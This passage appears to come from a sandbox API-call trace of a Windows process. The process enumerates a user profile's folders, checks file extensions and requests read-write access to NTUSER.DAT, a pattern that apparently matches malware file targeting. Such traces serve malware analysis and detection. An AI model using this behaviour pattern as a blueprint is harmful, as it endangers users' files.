HALPmcxz\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1ece8a70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ece8a70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.861] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1ece8a70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ece8a70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.861] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0146.861] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f160 [0146.861] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f6e0 [0146.861] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1c) returned 0x3240ca8 [0146.861] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f688 [0146.861] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0146.861] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x7bbdd0 [0146.861] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x7bbe38 [0146.861] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x38) returned 0x3220d98 [0146.861] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f160 [0146.861] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1ffcd910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ffcd910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0146.861] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f688 [0146.861] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f6e0 [0146.861] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x54) returned 0x3216cb0 [0146.861] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f630 [0146.861] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x7bbdd0 [0146.861] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0146.861] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f688 [0146.861] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f6e0 [0146.861] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x70) returned 0x31f3c98 [0146.861] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f5d8 [0146.861] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x7bbea0 [0146.861] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f580 [0146.862] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2035fa10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x2035fa10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0146.862] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f688 [0146.862] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f6e0 [0146.862] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xa8) returned 0x31e15a8 [0146.862] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f630 [0146.862] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x7bbdd0 [0146.862] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f528 [0146.862] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f000 [0146.862] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x20528a90, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20528a90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0146.862] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f688 [0146.862] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x76) returned 0x740aa8 [0146.862] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0146.862] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f688 [0146.862] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x76) returned 0x740aa8 [0146.862] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0146.862] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f160 [0146.862] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x76) returned 0x740aa8 [0146.862] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0146.862] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f160 [0146.862] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f000 [0146.862] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f528 [0146.862] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0146.862] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x7bbea0 [0146.862] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x7bc110 [0146.862] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x16c) returned 0x73bec0 [0146.862] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f160 [0146.862] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x3a64068 [0146.862] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f000 [0146.862] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f630 [0146.862] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f210 [0146.862] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x3a640d0 [0146.862] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x3a64138 [0146.862] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x3a641a0 [0146.862] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322eef8 [0146.863] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2059aeb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x2059aeb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0146.863] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f528 [0146.863] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f5d8 [0146.863] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f580 [0146.863] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0146.863] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x7bbea0 [0146.863] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x7bc110 [0146.863] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x7bbe38 [0146.863] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0146.863] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f528 [0146.863] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f5d8 [0146.863] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f6e0 [0146.863] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24b6fdf0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x24b6fdf0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0146.863] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x74d300 [0146.863] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x7bbea0 [0146.863] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT") returned=".DAT" [0146.863] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.863] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x24b49c90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0146.863] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x74d300 [0146.863] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x7bbea0 [0146.863] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned=".LOG1" [0146.863] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0146.863] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x74d300 [0146.863] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x7bbea0 [0146.863] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2") returned=".LOG2" [0146.864] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0146.864] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x74d300 [0146.864] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xb0) returned 0x3a66068 [0146.864] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned=".blf" [0146.864] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0146.864] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x74d300 [0146.864] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x100) returned 0x3a66068 [0146.864] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned=".regtrans-ms" [0146.864] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0146.864] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x74d300 [0146.864] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x100) returned 0x3a66068 [0146.864] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned=".regtrans-ms" [0146.864] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0146.864] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x74d300 [0146.864] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x7bbea0 [0146.864] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned=".ini" [0146.864] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x20822610, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20822610, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0146.864] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f528 [0146.864] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f5d8 [0146.864] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x214) returned 0x321a368 [0146.864] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f688 [0146.864] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x7bbea0 [0146.864] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f108 [0146.864] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f1b8 [0146.864] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f268 [0146.864] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x7bc110 [0146.864] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x7bc040 [0146.864] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x7bc0a8 [0146.864] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f2c0 [0146.864] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x3a64208 [0146.865] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322efa8 [0146.865] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x3a64270 [0146.865] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f4d0 [0146.865] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0146.865] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f528 [0146.865] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x76) returned 0x740aa8 [0146.865] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0146.865] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f528 [0146.865] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f5d8 [0146.865] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f580 [0146.865] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0146.865] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x7bbe38 [0146.865] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x3a641a0 [0146.865] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x3a64138 [0146.865] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0146.865] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f528 [0146.865] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, 